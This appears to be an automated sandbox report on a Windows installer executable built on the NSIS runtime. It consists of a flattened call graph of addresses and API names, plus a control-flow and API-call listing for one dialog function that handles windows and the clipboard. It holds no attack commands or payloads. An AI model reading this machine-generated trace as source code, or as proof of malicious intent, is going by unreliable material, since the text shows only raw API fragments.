SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                    Executed Functions

                                                                    Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                    • GetClientRect.USER32(?,?), ref: 004051C2
                                                                    • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                      • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004246CD,74DF23A0,00000000), ref: 00406902
                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                    • ShowWindow.USER32(00000000), ref: 00405313
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                    • ShowWindow.USER32(00000008), ref: 0040535F
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                    • CreatePopupMenu.USER32 ref: 004053A2
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                    • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                    • OpenClipboard.USER32(00000000), ref: 00405437
                                                                    • EmptyClipboard.USER32 ref: 0040543D
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                    • CloseClipboard.USER32 ref: 0040549A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
